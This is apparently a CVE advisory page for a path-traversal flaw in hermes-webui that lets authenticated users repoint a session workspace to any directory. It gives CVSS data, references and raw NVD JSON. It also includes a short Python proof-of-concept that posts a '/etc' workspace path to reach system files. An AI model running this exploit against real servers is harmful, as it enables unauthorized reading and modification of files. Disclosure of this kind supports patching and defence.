CVE-2026-6829

Description

nesquena hermes-webui contains a trust-boundary failure vulnerability that allows authenticated attackers to set or change a session workspace to an arbitrary existing directory on disk by manipulating workspace path parameters in endpoints such as /api/session/new, /api/session/update, /api/chat/start, and /api/workspaces/add. Attackers can repoint a session workspace to a directory outside the intended trusted root and then use ordinary file read and write APIs to access or modify files outside the intended workspace boundary within the permissions of the hermes-webui process.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

nesquena hermes-webui < v0.50.34

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit for CVE-2026-6829: Arbitrary Workspace Directory Access
# This script demonstrates how to change the workspace to an arbitrary directory.

target_url = "http://target-host:port/api/session/new"
headers = {"Content-Type": "application/json"}

# Malicious payload pointing to a sensitive directory (e.g., /etc)
payload = {
    "workspace": "/etc"
}

try:
    # Send request to hijack the workspace path
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] Successfully redirected workspace to /etc")
        print("[+] You can now use file read/write APIs to access files in /etc")
    else:
        print("[-] Exploit failed. Status code:", response.status_code)
        print("[-] Response:", response.text)
except Exception as e:
    print("[-] An error occurred:", str(e))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6829
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6829
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6829/
[4] VulDB https://vuldb.com/cve/CVE-2026-6829
[5] https://github.com/nesquena/hermes-webui/commit/2a7a5ddfaf39e3b0094b7ac37e9f1dbcf40a3918
[6] https://github.com/nesquena/hermes-webui/pull/416
[7] https://github.com/nesquena/hermes-webui/releases/tag/v0.50.34
[8] https://www.vulncheck.com/advisories/nesquena-hermes-webui-arbitrary-workspace-directory-access

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6829", "sourceIdentifier": "[email protected]", "published": "2026-04-21T22:16:20.690", "lastModified": "2026-04-22T21:20:25.267", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "nesquena hermes-webui contains a trust-boundary failure vulnerability that allows authenticated attackers to set or change a session workspace to an arbitrary existing directory on disk by manipulating workspace path parameters in endpoints such as /api/session/new, /api/session/update, /api/chat/start, and /api/workspaces/add. Attackers can repoint a session workspace to a directory outside the intended trusted root and then use ordinary file read and write APIs to access or modify files outside the intended workspace boundary within the permissions of the hermes-webui process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/nesquena/hermes-webui/commit/2a7a5ddfaf39e3b0094b7ac37e9f1dbcf40a3918", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/pull/416", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/releases/tag/v0.50.34", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/nesquena-hermes-webui-arbitrary-workspace-directory-access", "source": "[email protected]"}]}}